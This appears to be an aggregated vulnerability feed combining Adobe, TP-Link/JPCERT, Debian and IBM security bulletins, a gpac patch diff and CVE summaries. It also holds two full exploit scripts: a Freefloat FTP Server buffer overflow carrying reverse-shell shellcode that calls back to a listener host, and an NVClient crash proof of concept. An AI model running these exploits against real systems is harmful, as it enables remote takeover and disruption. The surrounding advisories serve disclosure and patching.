Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by a Path traversal vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available  for Adobe Acrobat and Reader | APSB21-51

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

CVSS base score   

**CVSS vector**  

**CVE Number**

Out-of-bounds Read 

(CWE-125)   

Memory leak

Important  

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-35988

CVE-2021-35987  

Path Traversal

(CWE-22)  

Arbitrary code execution  

Critical  

7.8  

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-35980

CVE-2021-28644  

Use After Free

(CWE-416)  

Arbitrary code execution   

Critical  

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2021-28640  

Type Confusion

(CWE-843)  

Arbitrary code execution   

Critical  

7.8   

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-28643  

Use After Free

(CWE-416)  

Arbitrary code execution   

Critical  

8.8  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-28641

CVE-2021-28639  

Out-of-bounds Write

(CWE-787)  

Arbitrary file system write  

Critical  

8.8  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-28642  

Out-of-bounds Read

(CWE-125)  

Memory leak  

Critical  

7.8  

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-28637  

Type Confusion

(CWE-843)  

Arbitrary file system read  

Important  

4.3  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-35986  

Heap-based Buffer Overflow

(CWE-122)  

Arbitrary code execution   

Critical  

8.8  

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2021-28638  

NULL Pointer Dereference

(CWE-476)  

Application denial-of-service  

Important  

5.5  

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H  

CVE-2021-35985

CVE-2021-35984  

Uncontrolled Search Path Element

(CWE-427)  

Arbitrary code execution   

Critical  

7.3  

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2021-28636  

OS Command Injection

(CWE-78)  

Arbitrary code execution   

Critical  

8.2  

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H  

CVE-2021-28634  

Use After Free 

(CWE-416)

Arbitrary code execution   

Critical  

7.8   

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H   

CVE-2021-35983

CVE-2021-35981

CVE-2021-28635

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:   

*   Nipun Gupta , Ashfaq Ansari and Krishnakant Patil - CloudFuzz working with Trend Micro Zero Day Initiative (CVE-2021-35983) 
*   Xu Peng from UCAS and Wang Yanhao from QiAnXin Technology Research Institute working with Trend Micro Zero Day Initiative (CVE-2021-35981, CVE-2021-28638)
*   Habooblabs (CVE-2021-35980, CVE-2021-28644, CVE-2021-35988, CVE-2021-35987, CVE-2021-28642, CVE-2021-28641, CVE-2021-35985, CVE-2021-35984, CVE-2021-28637)
*   Anonymous working with Trend Micro Zero Day Initiative (CVE-2021-28643, CVE-2021-35986)
*   o0xmuhe (CVE-2021-28640)
*   Kc Udonsi (@glitchnsec) of Trend Micro Security Research working with Trend Micro Zero Day Initiative (CVE-2021-28639)
*   Noah (howsubtle) (CVE-2021-28634)
*   xu peng (xupeng\_1231) (CVE-2021-28635)
*   Xavier Invers Fornells (m4gn3t1k) (CVE-2021-28636)

July 14, 2021: Updated acknowledgement details for CVE-2021-28640.

July 15, 2021: Updated acknowledgement details for CVE-2021-35981.  

July 29, 2021: Updated the CVSS base score and the CVSS vector for CVE-2021-28640, CVE-2021-28637, CVE-2021-28636.  
July 29, 2021: Updated the Vulnerability Impact, Severity, CVSS base score and the CVSS vector for CVE-2021-35988, CVE-2021-35987, CVE-2021-35987, CVE-2021-28644

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-28644: Adobe Security Bulletin

Deco M4 firmware versions prior to 'Deco M4(JP)_V2_1.5.8 Build 20230619' allows a network-adjacent authenticated attacker to execute arbitrary OS commands.

Published:2023/08/21  Last Updated:2023/08/21

**Overview**

Multiple products provided by TP-LINK contain multiple vulnerabilities.

**Products Affected**

**CVE-2023-31188、CVE-2023-32619**

*   Archer C50 firmware versions prior to "Archer C50(JP)\_V3\_230505"
*   Archer C55 firmware versions prior to "Archer C55(JP)\_V1\_230506"

**CVE-2023-36489**

*   TL-WR802N firmware versions prior to "TL-WR802N(JP)\_V4\_221008"
*   TL-WR841N firmware versions prior to "TL-WR841N(JP)\_V14\_230506"
*   TL-WR902AC firmware versions prior to "TL-WR902AC(JP)\_V3\_230506"

**CVE-2023-31188、CVE-2023-37284**

*   Archer C20 firmware versions prior to "Archer C20(JP)\_V1\_230616"

**CVE-2023-38563**

*   Archer C1200 firmware versions prior to "Archer C1200(JP)\_V2\_230508"
*   Archer C9 firmware versions prior to "Archer C9(JP)\_V3\_230508"

**CVE-2023-38568**

*   Archer A10 firmware versions prior to "Archer A10(JP)\_V2\_230504"

**CVE-2023-38588**

*   Archer C3150 firmware versions prior to "Archer C3150(JP)\_V2\_230511"

**CVE-2023-39224**

*   Archer C5 firmware all versions
*   Archer C7 firmware versions prior to "Archer C7(JP)\_V2\_230602"

**CVE-2023-39935**

*   Archer C5400 firmware versions prior to "Archer C5400(JP)\_V2\_230506"

**CVE-2022-24355**

*   TL-WR940N firmware versions prior to "TL-WR940N(JP)\_V6\_201103"

**CVE-2023-40193**

*   Deco M4 firmware versions prior to "Deco M4(JP)\_V2\_1.5.8 Build 20230619"

**CVE-2023-40357**

*   Archer AX50 firmware versions prior to "Archer AX50(JP)\_V1\_230529"
*   Archer A10 firmware versions prior to "Archer A10(JP)\_V2\_230504"
*   Archer AX10 firmware versions prior to "Archer AX10(JP)\_V1.2\_230508"
*   Archer AX11000 firmware versions prior to "Archer AX11000(JP)\_V1\_230523"

**CVE-2023-40531**

*   Archer AX6000 firmware versions prior to "Archer AX6000(JP)\_V1\_1.3.0 Build 20221208"

**Description**

Multiple products provided by TP-LINK contain multiple vulnerabilities listed below.

*   **OS command injection (CWE-78)** - CVE-2023-31188
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.0**
    
*   **Use of hard-coded credentials (CWE-798)** - CVE-2023-32619
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.8**
    
*   **OS command injection (CWE-78)** - CVE-2023-36489
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.8**
    
*   **Improper authentication (CWE-287)** - CVE-2023-37284
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.8**
    
*   **OS command injection (CWE-78)** - CVE-2023-38563
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.8**
    
*   **OS command injection (CWE-78)** - CVE-2023-38568
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.8**
    
*   **OS command injection (CWE-78)** - CVE-2023-38588
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.0**
    
*   **OS command injection (CWE-78)** - CVE-2023-39224
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.0**
    
*   **OS command injection (CWE-78)** - CVE-2023-39935
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.0**
    
*   **Stack-based buffer overflow (CWE-121)** - CVE-2022-24355
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.8**
    
*   **OS command injection (CWE-78)** - CVE-2023-40193
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.0**
    
*   **OS command injection (CWE-78)** - CVE-2023-40357
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.0**
    
*   **OS command injection (CWE-78)** - CVE-2023-40531
    
    CVSS v3
    
    CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.0**
    

**Impact**

The following attacks may be performed from the adjacent network:

*   An arbitrary OS command may be executed by a logged-in user - CVE-2023-31188
*   Hard-coded credentials may be used to login to the affected device, and an arbitrary OS command may be executed - CVE-2023-32619
*   An arbitrary OS command may be executed via a crafted request to bypass authentication - CVE-2023-37284
*   An arbitrary OS command may be executed - CVE-2023-36489, CVE-2023-38563, CVE-2023-38568
*   A logged-in user may execute an arbitrary OS command - CVE-2023-38588, CVE-2023-39224, CVE-2023-39935, CVE-2023-40193, CVE-2023-40357, CVE-2023-40531
*   An arbitrary code may be executed via a crafted request - CVE-2022-24355

**Solution**

**Update the Firmware**  
For products other than Archer C5, update the firmware to the latest version according to the information provided by the developer.

According to the developer, support for the Archer C5 has already ended, so there are no plans to provide an update.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

Chuya Hayakawa of 00One, Inc. reported these vulnerabilities to JPCERT/CC.  
JPCERT/CC coordinated with the developer.

**Other Information**

CVE-2023-40193: Multiple vulnerabilities in TP-Link products

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1873.

CVE-2023-4781

Debian Linux Security Advisory 5489-1 - A buffer overflow was found in file, a file type classification tool, which may result in denial of service if a specially crafted file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5489-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 04, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : fileCVE ID         : CVE-2022-48554A buffer overflow was found in file, a file type classification tool,which may result in denial of service if a specially crafted file isprocessed.For the oldstable distribution (bullseye), this problem has been fixedin version 1:5.39-3+deb11u1.We recommend that you upgrade your file packages.For the detailed security status of file please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/fileFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmT2NDVfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TNFg/+PpsDJJwxstMnU847dp8aR25v62Bboy3FRLrr16gbJozitu/uzsD9pdj7avI/WcpFaM2Y9in9odYhSccvgWcloq5o/MSm7IMplAm18O3D+m5pFdZw5GSIQKch3ZRl5F/37P6Kd2UQPXJoMhAUpNdL3LAjRjhfWji3LiWhNky+bOXLF3/TtPjhZutcffVoQ8Jvjd0U169i4s0i8lomMFs5AErReatFWbpRtWsGN1FYOUXpNa17n+sUwNaneWkthap+bkCINhFTzFCsiEd+QniY1Pyj8/V5EkWMYJzPPWLe0s93t2ORAGlMRmDzzCVEhtHWqOUz592DH9TqjJ8YeQtNd1o2KvTwYGWv63PN8ksoirFHYPqNj/hh6L4UuPc23tmNGtN7ErZnP45Z1SmSzAXVmm+YJjIjxO2qt2rg/DzdXXR8q/hR9FzYvlMQv058HQ67Vl1ua5d+66T8L7YgmJMoj6qDCJwmpRetfRPqOwucptPDlvRIYn23xSDQBkYFIbIPzoyvll+HYfhbkuvwa8hisK9PJfS5wEfU3Isp4CpKXhMkwNPgZyYFLqHt45Vbu1ROAy10Wwu18Lk+Vl9quUz5J0h3Go7Xuvk3xRx6NJPxRKiBGrqYhWcVw+bHgSn5oQCy0aNh4vzJy3bD8ZbQmXxiX/ytzN2TokgXBiIW6b3zGkM==kuBK-----END PGP SIGNATURE-----

Debian Security Advisory 5489-1

Freefloat FTP Server version 1.0 suffers from a remote buffer overflow vulnerability.

    #Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow#Date: 08/22/2023#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)#Vendor Homepage: http://www.freefoat.com#Version: 1.0#Tested on Windows XP SP3 #!/usr/bin/pythonimport socket#Metasploit Shellcode#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' #nc -lvp 4444#Send exploit#offset = 247 #badchars=\x00\x0d\#return_address=\x3b\x69\x5a\x77 (ole32.dll)payload = ("\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9""\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca""\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83""\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26""\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49""\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54""\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66""\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1""\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a""\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82""\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7""\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9""\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41""\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac""\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a""\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc""\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4""\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f""\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29""\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf""\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7""\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d""\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac""\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6""\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0""\x19")shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payloaddef main():    ip = '192.168.146.135'    port = 21    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.connect((ip, port))        sock.recv(1024)    sock.send('USER anonymous\r\n')    sock.recv(1024)    sock.send('PASS anonymous\r\n')    sock.recv(1024)    sock.send('pwd ' + shellcode + '\r\n')    sock.close()    if __name__ == '__main__':    main()

Freefloat FTP Server 1.0 Buffer Overflow

IBM Sterling Secure Proxy and IBM Sterling External Authentication Server 6.0.3 and 6.1.0 stores user credentials in plain clear text which can be read by a local user with container access.  IBM X-Force ID:  255585.

  

**Summary**

Multple vulnerabilities affect IBM Sterling Secure Proxy and are addressed in the latest release and iFix

**Vulnerability Details**

**CVEID:**   CVE-2023-26048  
**DESCRIPTION:**   Eclipse Jetty is vulnerable to a denial of service, caused by an out of memory flaw in the HttpServletRequest.getParameter() or HttpServletRequest.getParts() function. By sending a specially crafted multipart request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253356 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-26049  
**DESCRIPTION:**   Eclipse Jetty could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw during nonstandard cookie parsing. By sending a specially crafted request to tamper with the cookie parsing mechanism, an attacker could exploit this vulnerability to obtain values from other cookies, and use this information to launch further attacks against the affected system.  
CVSS Base score: 4.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253355 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-24998  
**DESCRIPTION:**   Apache Commons FileUpload and Tomcat are vulnerable to a denial of service, caused by not limit the number of request parts to be processed in the file upload function. By sending a specially-crafted request with series of uploads, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/247895 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-32338  
**DESCRIPTION:**   IBM Sterling Secure Proxy and IBM Sterling External Authentication Server stores user credentials in plain clear text which can be read by a local user with container access.  
CVSS Base score: 5.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255585 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-21930  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the JSSE component could allow an unauthenticated attacker to cause high confidentiality impact and high integrity impact.  
CVSS Base score: 7.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253115 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)

**CVEID:**   CVE-2021-33813  
**DESCRIPTION:**   JDOM is vulnerable to a denial of service, caused by an XXE issue in SAXBuilder. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to cause the a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/203804 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-22874  
**DESCRIPTION:**   IBM MQ Clients 9.2 CD, 9.3 CD, and 9.3 LTS are vulnerable to a denial of service attack when processing configuration files. IBM X-Force ID: 244216.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244216 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40609  
**DESCRIPTION:**   IBM SDK, Java Technology Edition 7.1.5.18 and 8.0.8.0 could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 236069.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236069 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-40149  
**DESCRIPTION:**   jettison-json Jettison is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted XML or JSON data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236352 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40150  
**DESCRIPTION:**   jettison-json Jettison is vulnerable to a denial of service, caused by an out of memory flaw. By sending a specially-crafted XML or JSON data, a remote authenticated attacker could exploit this vulnerability to causes the parser to crash, and results in a denial of service condition.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236353 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-45685  
**DESCRIPTION:**   Jettison is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending an overly long string using JSON data, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/242596 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-45693  
**DESCRIPTION:**   Jettison is vulnerable to a denial of service, caused by a stack-based buffer overflow. By sending a specially-crafted request using the map parameter, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/242274 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-1436  
**DESCRIPTION:**   Jettison is vulnerable to a denial of service, caused by an infinite recursion when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. A remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/250490 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Sterling Secure Proxy

6.0.3

IBM Sterling Secure Proxy

6.1.0

**Remediation/Fixes**

**Product**

**Version**

**iFix**

**Remediation**

IBM Sterling Secure Proxy

6.1.0

GA

Fix Central

IBM Sterling Secure Proxy

6.0.3

iFix 08

Fix Central

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

31 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS6PNW","label":"IBM Sterling Secure Proxy"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF051","label":"Linux on IBM Z Systems"},{"code":"PF033","label":"Windows"}\],"Version":"6.0.3, 6.1.0","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2023-32338: Security Bulletin: IBM Sterling Secure Proxy is vulnerable to multiple issues

NVClient version 5.0 suffers from a stack buffer overflow vulnerability.

    # Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 2023-08-19# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf# Vulnerability Type: Buffer Overflow Local# Tested On: Windows 10 64bit# Tested Version: 5.0# Steps to Reproduce:# 1- Run the python script and create exploit.txt file# 2- Open the application and log in# 3- Click the "Config" button in the upper menu# 4- Click the "User" button just below it# 5- Now click the "Add users" button in the lower left# 6- Fill in the Username, Password, and Confirm boxes# 7- Paste the characters from exploit.txt into the Contact box# 8- Click OK and crash!#!/usr/bin/env python3exploit = 'A' * 846try:    with open("exploit.txt","w") as file:        file.write(exploit)    print("POC is created")except:    print("POC not created")

NVClient 5.0 Stack Buffer Overflow

Stack-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3-DEV.

Expand Up

@@ -134,24 +134,31 @@ static GF\_Err gf\_bt\_report(GF\_BTParser \*parser, GF\_Err e, char \*format, ...)

  

void gf\_bt\_check\_line(GF\_BTParser \*parser)

{

while (1) {

reload\_line:

while (parser\->line\_pos < parser\->line\_size) {

switch (parser\->line\_buffer\[parser\->line\_pos\]) {

case ' ':

case '\\t':

case '\\n':

case '\\r':

parser\->line\_pos++;

continue;

case '\\0':

parser\->line\_pos \= parser\->line\_size;

default:

break;

}

break;

}

  

if (parser\->line\_buffer\[parser\->line\_pos\]\=='#') {

parser\->line\_size \= parser\->line\_pos;

if (parser\->line\_pos < parser\->line\_size) {

if (parser\->line\_buffer\[parser\->line\_pos\]\=='#') {

parser\->line\_size \= parser\->line\_pos;

}

else if ((parser\->line\_buffer\[parser\->line\_pos\]\=='/') && (parser\->line\_buffer\[parser\->line\_pos+1\]\=='/') ) {

parser\->line\_size \= parser\->line\_pos;

}

}

else if ((parser\->line\_buffer\[parser\->line\_pos\]\=='/') && (parser\->line\_buffer\[parser\->line\_pos+1\]\=='/') ) parser\->line\_size \= parser\->line\_pos;

  

if (parser\->line\_size \== parser\->line\_pos) {

/\*string based input - done\*/

Expand Down Expand Up

@@ -405,10 +412,15 @@ void gf\_bt\_check\_line(GF\_BTParser \*parser)

}

}

if (!parser\->line\_size) {

if (!gf\_gzeof(parser\->gz\_in)) gf\_bt\_check\_line(parser);

else parser\->done \= 1;

if (!gf\_gzeof(parser\->gz\_in))

//avoid recursion

goto reload\_line;

else

parser\->done \= 1;

}

else if (!parser\->done && (parser\->line\_size \== parser\->line\_pos)) gf\_bt\_check\_line(parser);

else if (!parser\->done && (parser\->line\_size \== parser\->line\_pos))

//avoid recursion

goto reload\_line;

}

  

void gf\_bt\_force\_line(GF\_BTParser \*parser)

Expand Down

CVE-2023-4756: Fixed #2584 · gpac/gpac@6914d01

In gnss service, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08044040; Issue ID: ALPS08044035.

CVE-2023-32817: September 2023

A vulnerability was found in Tenda AC8 16.03.34.06_cn_TDC01. It has been declared as critical. Affected by this vulnerability is the function formSetDeviceName. The manipulation leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-238633 was assigned to this vulnerability.

Tag

#buffer_overflow